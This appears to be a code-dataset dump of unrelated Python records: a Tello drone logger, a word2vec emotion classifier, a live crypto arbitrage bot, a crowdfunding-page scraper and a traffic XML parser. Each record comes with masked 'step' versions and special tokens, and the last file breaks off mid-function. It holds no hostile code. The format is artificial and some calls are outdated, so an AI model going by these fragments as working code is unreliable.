# Adiciona os novos valores em uma nova linha do DataFrame\n\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n def stop(self):\n self.tello.end()\n\n \n\n def run(self):\n self.tello.connect()\n self.tello.takeoff()\n tempo1 = self.tello.get_flight_time()\n tempo1 = tempo1[0:(len(tempo1)-1)]\n #time.sleep(3)\n bateria = self.tello.get_battery()\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:(len(tempo2)-1)]\n \n print('Nivel da bateria é: {}'.format(str(bateria)))\n \n print('Tempo de início foi {}'.format(str(tempo1)))\n print('Tempo de término foi de {}'.format(str(tempo2)))\n \n while ((int(tempo2) - int(tempo1)) < 10):\n print('Nivel da bateria é: ' + str(bateria))\n self.__array.append(self.tello.get_attitude())\n self.__data.append(self.tello.get_states()) \n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:(len(tempo2)-1)]\n\n self.tello.land()\n self.tello.end()\n print(self.__array)\n print(self.__data)\n\n\ndef main():\n dataTello = DataTello()\n dataTello.fly()\n #dataTello.stop()\n\nif __name__ == \"__main__\":\n main() ",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
# coding: utf-8
"""Supporting model logic for predicting emotional content of user input.
"""
import pandas as pd
import gensim
from sklearn.model_selection import train_test_split
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import LinearSVC
#load data for emo2vec
loc = 'https://s3-us-west-1.amazonaws.com/victorsdatasets/NRCEmotionLexiconv092AnnotatorandSenseLevel.txt'
print("loading & cleaning the data...")
em_words = pd.read_csv(loc, sep='\t', names=['annotator_id',
'remove',
'word',
'joy',
'sadness',
'fear',
'anger',
'trust',
'disgust',
'surprise',
'anticipation',
'POS'])
em_words.drop('remove', axis=1, inplace=True)
em_words['word'], em_words['synonym'] = em_words['word'].str.split('--').str
em_words['toss1'], em_words['joy'] = em_words['joy'].str.split('-').str
em_words['toss2'], em_words['sadness'] = em_words['sadness'].str.split('-').str
em_words['toss3'], em_words['fear'] = em_words['fear'].str.split('-').str
em_words['toss4'], em_words['anger'] = em_words['anger'].str.split('-').str
em_words['toss5'], em_words['trust'] = em_words['trust'].str.split('-').str
em_words['toss6'], em_words['disgust'] = em_words['disgust'].str.split('-').str
em_words['toss7'], em_words['surprise'] = em_words['surprise'].str.split('-').str
em_words['toss8'], em_words['anticipation'] = em_words['anticipation'].str.split('-').str
em_words['toss9'], em_words['POS'] = em_words['POS'].str.split('-').str
em_words.drop(['toss1','toss2','toss3','toss4','toss5','toss6','toss7','toss8','toss9'],
axis=1,
inplace=True)
new_cols = ['annotator_id',
'word','synonym',
'joy',
'sadness',
'fear',
'anger',
'trust',
'disgust',
'surprise',
'anticipation',
'POS']
em_words = em_words.reindex_axis(new_cols, axis=1)
emotions = em_words[['joy',
'sadness',
'fear',
'anger',
'trust',
'disgust',
'surprise',
'anticipation']]
em_words[emotions.columns] = em_words[emotions.columns].apply(pd.to_numeric)
affected = em_words[emotions.columns].groupby([em_words['word']], sort=False).mean().reset_index()
# Load Google's pre-trained Word2Vec model.
print('training the word2vec model from google\'s corpus')
model = gensim.models.Word2Vec.load_word2vec_format('../GoogleNews-vectors-negative300.bin', binary=True)
# create list of word indicies to drop to avoid keyerrors with Google's pre-trained model.
idx_to_drop = []
def dropper():
for ex in affected['word']:
if ex not in model.vocab:
idx_to_drop.append(affected.loc[affected.word == ex].index[0])
# drop words from affected that are not in google's model
dropper()
affected = affected.drop(idx_to_drop, axis=0)
G_vectors = lambda x: model[x]
affected['word_vectors'] = affected['word'].apply(G_vectors)
affected['label_vectors'] = affected[emotions.columns].values.tolist()
affected['binary'] = (affected[emotions.columns] > 0).astype(int).values.tolist()
df1 = affected[emotions.columns].rank(method='max', axis=1).rank(method='first', axis=1)
ma = df1.max().max()
affected['label'] = (df1== ma).astype(int).values.tolist()
affected['target'] = affected['label'].apply(lambda x: x.index(1))
label_dict = {0 : 'joy',
1 : 'sadness',
2 : 'fear',
3 : 'anger',
4 : 'trust',
5 : 'disgust',
6 : 'surprise',
7 : 'anticipation'}
affected['label_name'] = affected['target'].apply(lambda x: label_dict[x])
emo2vec = affected[['word_vectors', 'label_vectors', 'binary', 'label', 'target', 'label_name']]
# # Model Testing
print("splitting into train/test groups...")
emo_X, emo_y = list(emo2vec.word_vectors), list(emo2vec.target)
emo_X_train, emo_X_test, emo_y_train, emo_y_test = train_test_split(emo_X, emo_y, random_state=42)
# ### OnevsRest with LinearSVC (best score)
print("creating a model with the best stuff we've got...")
OVR = OneVsRestClassifier(LinearSVC(random_state=0), n_jobs=-1)
emo_model = OVR.fit(emo_X_train, emo_y_train)
|
normal
|
{
"blob_id": "f5f26819be4b98fab3d46e57e1a5431e54342aed",
"index": 414,
"step-1": "<mask token>\n\n\ndef dropper():\n for ex in affected['word']:\n if ex not in model.vocab:\n idx_to_drop.append(affected.loc[affected.word == ex].index[0])\n\n\n<mask token>\n",
"step-2": "<mask token>\nprint('loading & cleaning the data...')\n<mask token>\nem_words.drop('remove', axis=1, inplace=True)\n<mask token>\nem_words.drop(['toss1', 'toss2', 'toss3', 'toss4', 'toss5', 'toss6',\n 'toss7', 'toss8', 'toss9'], axis=1, inplace=True)\n<mask token>\nprint(\"training the word2vec model from google's corpus\")\n<mask token>\n\n\ndef dropper():\n for ex in affected['word']:\n if ex not in model.vocab:\n idx_to_drop.append(affected.loc[affected.word == ex].index[0])\n\n\ndropper()\n<mask token>\nprint('splitting into train/test groups...')\n<mask token>\nprint(\"creating a model with the best stuff we've got...\")\n<mask token>\n",
"step-3": "<mask token>\nloc = (\n 'https://s3-us-west-1.amazonaws.com/victorsdatasets/NRCEmotionLexiconv092AnnotatorandSenseLevel.txt'\n )\nprint('loading & cleaning the data...')\nem_words = pd.read_csv(loc, sep='\\t', names=['annotator_id', 'remove',\n 'word', 'joy', 'sadness', 'fear', 'anger', 'trust', 'disgust',\n 'surprise', 'anticipation', 'POS'])\nem_words.drop('remove', axis=1, inplace=True)\nem_words['word'], em_words['synonym'] = em_words['word'].str.split('--').str\nem_words['toss1'], em_words['joy'] = em_words['joy'].str.split('-').str\nem_words['toss2'], em_words['sadness'] = em_words['sadness'].str.split('-').str\nem_words['toss3'], em_words['fear'] = em_words['fear'].str.split('-').str\nem_words['toss4'], em_words['anger'] = em_words['anger'].str.split('-').str\nem_words['toss5'], em_words['trust'] = em_words['trust'].str.split('-').str\nem_words['toss6'], em_words['disgust'] = em_words['disgust'].str.split('-').str\nem_words['toss7'], em_words['surprise'] = em_words['surprise'].str.split('-'\n ).str\nem_words['toss8'], em_words['anticipation'] = em_words['anticipation'\n ].str.split('-').str\nem_words['toss9'], em_words['POS'] = em_words['POS'].str.split('-').str\nem_words.drop(['toss1', 'toss2', 'toss3', 'toss4', 'toss5', 'toss6',\n 'toss7', 'toss8', 'toss9'], axis=1, inplace=True)\nnew_cols = ['annotator_id', 'word', 'synonym', 'joy', 'sadness', 'fear',\n 'anger', 'trust', 'disgust', 'surprise', 'anticipation', 'POS']\nem_words = em_words.reindex_axis(new_cols, axis=1)\nemotions = em_words[['joy', 'sadness', 'fear', 'anger', 'trust', 'disgust',\n 'surprise', 'anticipation']]\nem_words[emotions.columns] = em_words[emotions.columns].apply(pd.to_numeric)\naffected = em_words[emotions.columns].groupby([em_words['word']], sort=False\n ).mean().reset_index()\nprint(\"training the word2vec model from google's corpus\")\nmodel = gensim.models.Word2Vec.load_word2vec_format(\n '../GoogleNews-vectors-negative300.bin', binary=True)\nidx_to_drop = []\n\n\ndef dropper():\n for ex in affected['word']:\n if ex not in model.vocab:\n idx_to_drop.append(affected.loc[affected.word == ex].index[0])\n\n\ndropper()\naffected = affected.drop(idx_to_drop, axis=0)\nG_vectors = lambda x: model[x]\naffected['word_vectors'] = affected['word'].apply(G_vectors)\naffected['label_vectors'] = affected[emotions.columns].values.tolist()\naffected['binary'] = (affected[emotions.columns] > 0).astype(int\n ).values.tolist()\ndf1 = affected[emotions.columns].rank(method='max', axis=1).rank(method=\n 'first', axis=1)\nma = df1.max().max()\naffected['label'] = (df1 == ma).astype(int).values.tolist()\naffected['target'] = affected['label'].apply(lambda x: x.index(1))\nlabel_dict = {(0): 'joy', (1): 'sadness', (2): 'fear', (3): 'anger', (4):\n 'trust', (5): 'disgust', (6): 'surprise', (7): 'anticipation'}\naffected['label_name'] = affected['target'].apply(lambda x: label_dict[x])\nemo2vec = affected[['word_vectors', 'label_vectors', 'binary', 'label',\n 'target', 'label_name']]\nprint('splitting into train/test groups...')\nemo_X, emo_y = list(emo2vec.word_vectors), list(emo2vec.target)\nemo_X_train, emo_X_test, emo_y_train, emo_y_test = train_test_split(emo_X,\n emo_y, random_state=42)\nprint(\"creating a model with the best stuff we've got...\")\nOVR = OneVsRestClassifier(LinearSVC(random_state=0), n_jobs=-1)\nemo_model = OVR.fit(emo_X_train, emo_y_train)\n",
"step-4": "<mask token>\nimport pandas as pd\nimport gensim\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.svm import LinearSVC\nloc = (\n 'https://s3-us-west-1.amazonaws.com/victorsdatasets/NRCEmotionLexiconv092AnnotatorandSenseLevel.txt'\n )\nprint('loading & cleaning the data...')\nem_words = pd.read_csv(loc, sep='\\t', names=['annotator_id', 'remove',\n 'word', 'joy', 'sadness', 'fear', 'anger', 'trust', 'disgust',\n 'surprise', 'anticipation', 'POS'])\nem_words.drop('remove', axis=1, inplace=True)\nem_words['word'], em_words['synonym'] = em_words['word'].str.split('--').str\nem_words['toss1'], em_words['joy'] = em_words['joy'].str.split('-').str\nem_words['toss2'], em_words['sadness'] = em_words['sadness'].str.split('-').str\nem_words['toss3'], em_words['fear'] = em_words['fear'].str.split('-').str\nem_words['toss4'], em_words['anger'] = em_words['anger'].str.split('-').str\nem_words['toss5'], em_words['trust'] = em_words['trust'].str.split('-').str\nem_words['toss6'], em_words['disgust'] = em_words['disgust'].str.split('-').str\nem_words['toss7'], em_words['surprise'] = em_words['surprise'].str.split('-'\n ).str\nem_words['toss8'], em_words['anticipation'] = em_words['anticipation'\n ].str.split('-').str\nem_words['toss9'], em_words['POS'] = em_words['POS'].str.split('-').str\nem_words.drop(['toss1', 'toss2', 'toss3', 'toss4', 'toss5', 'toss6',\n 'toss7', 'toss8', 'toss9'], axis=1, inplace=True)\nnew_cols = ['annotator_id', 'word', 'synonym', 'joy', 'sadness', 'fear',\n 'anger', 'trust', 'disgust', 'surprise', 'anticipation', 'POS']\nem_words = em_words.reindex_axis(new_cols, axis=1)\nemotions = em_words[['joy', 'sadness', 'fear', 'anger', 'trust', 'disgust',\n 'surprise', 'anticipation']]\nem_words[emotions.columns] = em_words[emotions.columns].apply(pd.to_numeric)\naffected = em_words[emotions.columns].groupby([em_words['word']], sort=False\n ).mean().reset_index()\nprint(\"training the word2vec model from google's corpus\")\nmodel = gensim.models.Word2Vec.load_word2vec_format(\n '../GoogleNews-vectors-negative300.bin', binary=True)\nidx_to_drop = []\n\n\ndef dropper():\n for ex in affected['word']:\n if ex not in model.vocab:\n idx_to_drop.append(affected.loc[affected.word == ex].index[0])\n\n\ndropper()\naffected = affected.drop(idx_to_drop, axis=0)\nG_vectors = lambda x: model[x]\naffected['word_vectors'] = affected['word'].apply(G_vectors)\naffected['label_vectors'] = affected[emotions.columns].values.tolist()\naffected['binary'] = (affected[emotions.columns] > 0).astype(int\n ).values.tolist()\ndf1 = affected[emotions.columns].rank(method='max', axis=1).rank(method=\n 'first', axis=1)\nma = df1.max().max()\naffected['label'] = (df1 == ma).astype(int).values.tolist()\naffected['target'] = affected['label'].apply(lambda x: x.index(1))\nlabel_dict = {(0): 'joy', (1): 'sadness', (2): 'fear', (3): 'anger', (4):\n 'trust', (5): 'disgust', (6): 'surprise', (7): 'anticipation'}\naffected['label_name'] = affected['target'].apply(lambda x: label_dict[x])\nemo2vec = affected[['word_vectors', 'label_vectors', 'binary', 'label',\n 'target', 'label_name']]\nprint('splitting into train/test groups...')\nemo_X, emo_y = list(emo2vec.word_vectors), list(emo2vec.target)\nemo_X_train, emo_X_test, emo_y_train, emo_y_test = train_test_split(emo_X,\n emo_y, random_state=42)\nprint(\"creating a model with the best stuff we've got...\")\nOVR = OneVsRestClassifier(LinearSVC(random_state=0), n_jobs=-1)\nemo_model = OVR.fit(emo_X_train, emo_y_train)\n",
"step-5": "\n# coding: utf-8\n\"\"\"Supporting model logic for predicting emotional content of user input.\n\"\"\"\nimport pandas as pd\nimport gensim\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.svm import LinearSVC\n\n#load data for emo2vec\nloc = 'https://s3-us-west-1.amazonaws.com/victorsdatasets/NRCEmotionLexiconv092AnnotatorandSenseLevel.txt'\nprint(\"loading & cleaning the data...\")\nem_words = pd.read_csv(loc, sep='\\t', names=['annotator_id',\n 'remove',\n 'word',\n 'joy',\n 'sadness',\n 'fear',\n 'anger',\n 'trust',\n 'disgust',\n 'surprise',\n 'anticipation',\n 'POS'])\n\nem_words.drop('remove', axis=1, inplace=True)\n\nem_words['word'], em_words['synonym'] = em_words['word'].str.split('--').str\n\nem_words['toss1'], em_words['joy'] = em_words['joy'].str.split('-').str\nem_words['toss2'], em_words['sadness'] = em_words['sadness'].str.split('-').str\nem_words['toss3'], em_words['fear'] = em_words['fear'].str.split('-').str\nem_words['toss4'], em_words['anger'] = em_words['anger'].str.split('-').str\nem_words['toss5'], em_words['trust'] = em_words['trust'].str.split('-').str\nem_words['toss6'], em_words['disgust'] = em_words['disgust'].str.split('-').str\nem_words['toss7'], em_words['surprise'] = em_words['surprise'].str.split('-').str\nem_words['toss8'], em_words['anticipation'] = em_words['anticipation'].str.split('-').str\nem_words['toss9'], em_words['POS'] = em_words['POS'].str.split('-').str\n\nem_words.drop(['toss1','toss2','toss3','toss4','toss5','toss6','toss7','toss8','toss9'],\n axis=1,\n inplace=True)\n\nnew_cols = ['annotator_id',\n 'word','synonym',\n 'joy',\n 'sadness',\n 'fear',\n 'anger',\n 'trust',\n 'disgust',\n 'surprise',\n 'anticipation',\n 'POS']\nem_words = em_words.reindex_axis(new_cols, axis=1)\n\nemotions = em_words[['joy',\n 'sadness',\n 'fear',\n 'anger',\n 'trust',\n 'disgust',\n 'surprise',\n 'anticipation']]\n\nem_words[emotions.columns] = em_words[emotions.columns].apply(pd.to_numeric)\n\naffected = em_words[emotions.columns].groupby([em_words['word']], sort=False).mean().reset_index()\n\n# Load Google's pre-trained Word2Vec model.\nprint('training the word2vec model from google\\'s corpus')\nmodel = gensim.models.Word2Vec.load_word2vec_format('../GoogleNews-vectors-negative300.bin', binary=True)\n\n# create list of word indicies to drop to avoid keyerrors with Google's pre-trained model.\nidx_to_drop = []\ndef dropper():\n for ex in affected['word']:\n if ex not in model.vocab:\n idx_to_drop.append(affected.loc[affected.word == ex].index[0])\n\n# drop words from affected that are not in google's model\ndropper()\naffected = affected.drop(idx_to_drop, axis=0)\n\nG_vectors = lambda x: model[x]\naffected['word_vectors'] = affected['word'].apply(G_vectors)\n\naffected['label_vectors'] = affected[emotions.columns].values.tolist()\n\naffected['binary'] = (affected[emotions.columns] > 0).astype(int).values.tolist()\n\ndf1 = affected[emotions.columns].rank(method='max', axis=1).rank(method='first', axis=1)\nma = df1.max().max()\naffected['label'] = (df1== ma).astype(int).values.tolist()\naffected['target'] = affected['label'].apply(lambda x: x.index(1))\nlabel_dict = {0 : 'joy',\n 1 : 'sadness',\n 2 : 'fear',\n 3 : 'anger',\n 4 : 'trust',\n 5 : 'disgust',\n 6 : 'surprise',\n 7 : 'anticipation'}\n\naffected['label_name'] = affected['target'].apply(lambda x: label_dict[x])\n\nemo2vec = affected[['word_vectors', 'label_vectors', 'binary', 'label', 'target', 'label_name']]\n\n# # Model Testing\nprint(\"splitting into train/test groups...\")\nemo_X, emo_y = list(emo2vec.word_vectors), list(emo2vec.target)\nemo_X_train, emo_X_test, emo_y_train, emo_y_test = train_test_split(emo_X, emo_y, random_state=42)\n\n\n# ### OnevsRest with LinearSVC (best score)\n\nprint(\"creating a model with the best stuff we've got...\")\nOVR = OneVsRestClassifier(LinearSVC(random_state=0), n_jobs=-1)\nemo_model = OVR.fit(emo_X_train, emo_y_train)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
trade_bot.start(sleep=1)
print('Done!')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
brokers = create_brokers('LIVE', config.CURRENCIES, config.EXCHANGES)
gp = brokers[2]
trade_bot = ArbitrageBot(config, brokers)
trade_bot.start(sleep=1)
print('Done!')
<|reserved_special_token_1|>
from common.utils import create_brokers
from Bot import DataGatherBot, ArbitrageBot
import api_config as config
brokers = create_brokers('LIVE', config.CURRENCIES, config.EXCHANGES)
gp = brokers[2]
trade_bot = ArbitrageBot(config, brokers)
trade_bot.start(sleep=1)
print('Done!')
<|reserved_special_token_1|>
from common.utils import create_brokers
from Bot import DataGatherBot, ArbitrageBot
import api_config as config
### PAPER 이라고 정의한
# brokers = create_brokers('PAPER', config.CURRENCIES, config.EXCHANGES)
# bot = ArbitrageBot(config, brokers)
# brokers = create_brokers('BACKTEST', config.CURRENCIES, config.EXCHANGES)
# bot = ArbitrageBot(config, brokers) # this automatically loads the data path file.
# backtest_data = '/Users/ericjang/Desktop/LiClipse_Workspace/btc_arbitrage/data/Mar-29-2014_19-00-35__20_14400.p'
# bot.backtest(backtest_data) # start should probably be modified to also allow time ranges (i.e. if i want to run my live trader for 2 hours)
# print('done!')
brokers = create_brokers('LIVE', config.CURRENCIES, config.EXCHANGES)
gp = brokers[2]
# gp.update_all_balances()
# gp.xchg.get_all_balances()
# gatherbot = DataGatherBot(config, brokers)
# maxdepth 체크할 호가 개수(-1)
# gatherbot.start(sleep=1, duration=60 * 60 * 4, maxdepth=4) # 5 hours of data, one minute intervals
# arbiragebot의 경우
trade_bot = ArbitrageBot(config, brokers)
trade_bot.start(sleep=1)
print('Done!')
|
flexible
|
{
"blob_id": "4436fa36ec21edb3be467f74d8b9705780535f22",
"index": 6786,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntrade_bot.start(sleep=1)\nprint('Done!')\n",
"step-3": "<mask token>\nbrokers = create_brokers('LIVE', config.CURRENCIES, config.EXCHANGES)\ngp = brokers[2]\ntrade_bot = ArbitrageBot(config, brokers)\ntrade_bot.start(sleep=1)\nprint('Done!')\n",
"step-4": "from common.utils import create_brokers\nfrom Bot import DataGatherBot, ArbitrageBot\nimport api_config as config\nbrokers = create_brokers('LIVE', config.CURRENCIES, config.EXCHANGES)\ngp = brokers[2]\ntrade_bot = ArbitrageBot(config, brokers)\ntrade_bot.start(sleep=1)\nprint('Done!')\n",
"step-5": "from common.utils import create_brokers\nfrom Bot import DataGatherBot, ArbitrageBot\nimport api_config as config\n\n### PAPER 이라고 정의한\n# brokers = create_brokers('PAPER', config.CURRENCIES, config.EXCHANGES)\n# bot = ArbitrageBot(config, brokers)\n\n# brokers = create_brokers('BACKTEST', config.CURRENCIES, config.EXCHANGES)\n# bot = ArbitrageBot(config, brokers) # this automatically loads the data path file.\n# backtest_data = '/Users/ericjang/Desktop/LiClipse_Workspace/btc_arbitrage/data/Mar-29-2014_19-00-35__20_14400.p'\n# bot.backtest(backtest_data) # start should probably be modified to also allow time ranges (i.e. if i want to run my live trader for 2 hours)\n# print('done!')\n\nbrokers = create_brokers('LIVE', config.CURRENCIES, config.EXCHANGES)\ngp = brokers[2]\n# gp.update_all_balances()\n# gp.xchg.get_all_balances()\n\n# gatherbot = DataGatherBot(config, brokers)\n# maxdepth 체크할 호가 개수(-1)\n# gatherbot.start(sleep=1, duration=60 * 60 * 4, maxdepth=4) # 5 hours of data, one minute intervals\n\n# arbiragebot의 경우\ntrade_bot = ArbitrageBot(config, brokers)\ntrade_bot.start(sleep=1)\nprint('Done!')\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if r.status_code == 200:
text = r.text
pattern = 'Přispěvatel'
m = re.search(pattern, text)
pattern2 = '<strong>([0-9]{1,})'
m2 = re.search(pattern2, text[m.start():])
pattern3 = 'currency " >([0-9]{1,})'
m3 = re.search(pattern3, text.replace(' ', ''))
with open(path + 'data.json', 'w') as fdata:
json.dump({'date': datetime.datetime.now().isoformat(), 'amount':
m3.group(1), 'supporters': m2.group(1)}, fdata)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
r = requests.get(
'https://www.hithit.com/cs/project/4067/volebni-kalkulacka-on-steroids')
path = os.path.dirname(os.path.realpath(__file__)) + '/'
if r.status_code == 200:
text = r.text
pattern = 'Přispěvatel'
m = re.search(pattern, text)
pattern2 = '<strong>([0-9]{1,})'
m2 = re.search(pattern2, text[m.start():])
pattern3 = 'currency " >([0-9]{1,})'
m3 = re.search(pattern3, text.replace(' ', ''))
with open(path + 'data.json', 'w') as fdata:
json.dump({'date': datetime.datetime.now().isoformat(), 'amount':
m3.group(1), 'supporters': m2.group(1)}, fdata)
<|reserved_special_token_1|>
import csv
import datetime
import json
import re
import requests
import os
r = requests.get(
'https://www.hithit.com/cs/project/4067/volebni-kalkulacka-on-steroids')
path = os.path.dirname(os.path.realpath(__file__)) + '/'
if r.status_code == 200:
text = r.text
pattern = 'Přispěvatel'
m = re.search(pattern, text)
pattern2 = '<strong>([0-9]{1,})'
m2 = re.search(pattern2, text[m.start():])
pattern3 = 'currency " >([0-9]{1,})'
m3 = re.search(pattern3, text.replace(' ', ''))
with open(path + 'data.json', 'w') as fdata:
json.dump({'date': datetime.datetime.now().isoformat(), 'amount':
m3.group(1), 'supporters': m2.group(1)}, fdata)
<|reserved_special_token_1|>
import csv
import datetime
import json
import re
import requests
import os
r = requests.get("https://www.hithit.com/cs/project/4067/volebni-kalkulacka-on-steroids")
path = os.path.dirname(os.path.realpath(__file__)) + "/"
if r.status_code == 200:
text = r.text
pattern = 'Přispěvatel'
m = re.search(pattern, text)
pattern2 = '<strong>([0-9]{1,})'
m2 = re.search(pattern2, text[m.start():])
pattern3 = 'currency " >([0-9]{1,})'
m3 = re.search(pattern3, text.replace(' ', ''))
with open(path + "data.json", "w") as fdata:
json.dump({
"date": datetime.datetime.now().isoformat(),
"amount": m3.group(1),
"supporters": m2.group(1)
}, fdata)
|
flexible
|
{
"blob_id": "f3329962004a4454c04327da56d8dd1d0f1d45e7",
"index": 763,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif r.status_code == 200:\n text = r.text\n pattern = 'Přispěvatel'\n m = re.search(pattern, text)\n pattern2 = '<strong>([0-9]{1,})'\n m2 = re.search(pattern2, text[m.start():])\n pattern3 = 'currency \" >([0-9]{1,})'\n m3 = re.search(pattern3, text.replace(' ', ''))\n with open(path + 'data.json', 'w') as fdata:\n json.dump({'date': datetime.datetime.now().isoformat(), 'amount':\n m3.group(1), 'supporters': m2.group(1)}, fdata)\n",
"step-3": "<mask token>\nr = requests.get(\n 'https://www.hithit.com/cs/project/4067/volebni-kalkulacka-on-steroids')\npath = os.path.dirname(os.path.realpath(__file__)) + '/'\nif r.status_code == 200:\n text = r.text\n pattern = 'Přispěvatel'\n m = re.search(pattern, text)\n pattern2 = '<strong>([0-9]{1,})'\n m2 = re.search(pattern2, text[m.start():])\n pattern3 = 'currency \" >([0-9]{1,})'\n m3 = re.search(pattern3, text.replace(' ', ''))\n with open(path + 'data.json', 'w') as fdata:\n json.dump({'date': datetime.datetime.now().isoformat(), 'amount':\n m3.group(1), 'supporters': m2.group(1)}, fdata)\n",
"step-4": "import csv\nimport datetime\nimport json\nimport re\nimport requests\nimport os\nr = requests.get(\n 'https://www.hithit.com/cs/project/4067/volebni-kalkulacka-on-steroids')\npath = os.path.dirname(os.path.realpath(__file__)) + '/'\nif r.status_code == 200:\n text = r.text\n pattern = 'Přispěvatel'\n m = re.search(pattern, text)\n pattern2 = '<strong>([0-9]{1,})'\n m2 = re.search(pattern2, text[m.start():])\n pattern3 = 'currency \" >([0-9]{1,})'\n m3 = re.search(pattern3, text.replace(' ', ''))\n with open(path + 'data.json', 'w') as fdata:\n json.dump({'date': datetime.datetime.now().isoformat(), 'amount':\n m3.group(1), 'supporters': m2.group(1)}, fdata)\n",
"step-5": "import csv\nimport datetime\nimport json\nimport re\nimport requests\nimport os\n\nr = requests.get(\"https://www.hithit.com/cs/project/4067/volebni-kalkulacka-on-steroids\")\n\npath = os.path.dirname(os.path.realpath(__file__)) + \"/\"\n\nif r.status_code == 200:\n text = r.text\n pattern = 'Přispěvatel'\n m = re.search(pattern, text)\n pattern2 = '<strong>([0-9]{1,})'\n m2 = re.search(pattern2, text[m.start():])\n pattern3 = 'currency \" >([0-9]{1,})'\n m3 = re.search(pattern3, text.replace(' ', ''))\n with open(path + \"data.json\", \"w\") as fdata:\n json.dump({\n \"date\": datetime.datetime.now().isoformat(),\n \"amount\": m3.group(1),\n \"supporters\": m2.group(1)\n }, fdata)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def get_branches_dir(root_dir):
branches_dir = []
folds = os.listdir(root_dir)
while folds:
branch_dir = root_dir + '/' + folds.pop()
branches_dir.append(branch_dir)
return branches_dir
def tolist(xml, detname):
try:
data = minidom.parse(xml)
except:
print('parse error')
ErrorFiles.append(xml)
return
detectors = data.documentElement
date = detectors.getElementsByTagName('date')[0].childNodes[0].data
time = detectors.getElementsByTagName('time')[0].childNodes[0].data
dets = detectors.getElementsByTagName('detector')
laneVolume = 0
laneOccupancy = 0
laneSpeed = 0
for det in dets:
try:
detectorID = det.getElementsByTagName('detector-Id')[0]
except IndexError:
continue
if detectorID.childNodes[0].data in detname:
lanes = det.getElementsByTagName('lane')
for lane in lanes:
laneStatus = lane.getElementsByTagName('lane-Status')[0]
if laneStatus.childNodes[0].data == 'OK':
try:
laneVolume += int(lane.getElementsByTagName(
'lane-Volume')[0].childNodes[0].data)
laneOccupancy += int(lane.getElementsByTagName(
'lane-Occupancy')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
laneSpeed += int(lane.getElementsByTagName(
'lane-Speed')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
except IndexError:
break
else:
break
if laneVolume > 0:
for i in range(0, len(detname)):
if detectorID.childNodes[0].data == detname[i]:
c = i
detectorData[c][0].append(date)
detectorData[c][1].append(time)
detectorData[c][2].append(laneVolume)
detectorData[c][3].append(laneOccupancy / float(laneVolume))
detectorData[c][4].append(laneSpeed / float(laneVolume))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_branches_dir(root_dir):
branches_dir = []
folds = os.listdir(root_dir)
while folds:
branch_dir = root_dir + '/' + folds.pop()
branches_dir.append(branch_dir)
return branches_dir
def tolist(xml, detname):
try:
data = minidom.parse(xml)
except:
print('parse error')
ErrorFiles.append(xml)
return
detectors = data.documentElement
date = detectors.getElementsByTagName('date')[0].childNodes[0].data
time = detectors.getElementsByTagName('time')[0].childNodes[0].data
dets = detectors.getElementsByTagName('detector')
laneVolume = 0
laneOccupancy = 0
laneSpeed = 0
for det in dets:
try:
detectorID = det.getElementsByTagName('detector-Id')[0]
except IndexError:
continue
if detectorID.childNodes[0].data in detname:
lanes = det.getElementsByTagName('lane')
for lane in lanes:
laneStatus = lane.getElementsByTagName('lane-Status')[0]
if laneStatus.childNodes[0].data == 'OK':
try:
laneVolume += int(lane.getElementsByTagName(
'lane-Volume')[0].childNodes[0].data)
laneOccupancy += int(lane.getElementsByTagName(
'lane-Occupancy')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
laneSpeed += int(lane.getElementsByTagName(
'lane-Speed')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
except IndexError:
break
else:
break
if laneVolume > 0:
for i in range(0, len(detname)):
if detectorID.childNodes[0].data == detname[i]:
c = i
detectorData[c][0].append(date)
detectorData[c][1].append(time)
detectorData[c][2].append(laneVolume)
detectorData[c][3].append(laneOccupancy / float(laneVolume))
detectorData[c][4].append(laneSpeed / float(laneVolume))
<|reserved_special_token_0|>
os.chdir(month_dir)
<|reserved_special_token_0|>
for dayFile in day_dir:
detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [],
[], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [
], []]]
xmlFiles = get_branches_dir(dayFile)
for xml in xmlFiles:
if not os.path.isdir(xml):
print(xml)
tolist(xml, detNames)
for i in range(0, len(detNames)):
m = np.array(detectorData[i])
os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/' + detNames[i])
np.save(detectorData[0][0][0] + '.npy', m)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_branches_dir(root_dir):
branches_dir = []
folds = os.listdir(root_dir)
while folds:
branch_dir = root_dir + '/' + folds.pop()
branches_dir.append(branch_dir)
return branches_dir
def tolist(xml, detname):
try:
data = minidom.parse(xml)
except:
print('parse error')
ErrorFiles.append(xml)
return
detectors = data.documentElement
date = detectors.getElementsByTagName('date')[0].childNodes[0].data
time = detectors.getElementsByTagName('time')[0].childNodes[0].data
dets = detectors.getElementsByTagName('detector')
laneVolume = 0
laneOccupancy = 0
laneSpeed = 0
for det in dets:
try:
detectorID = det.getElementsByTagName('detector-Id')[0]
except IndexError:
continue
if detectorID.childNodes[0].data in detname:
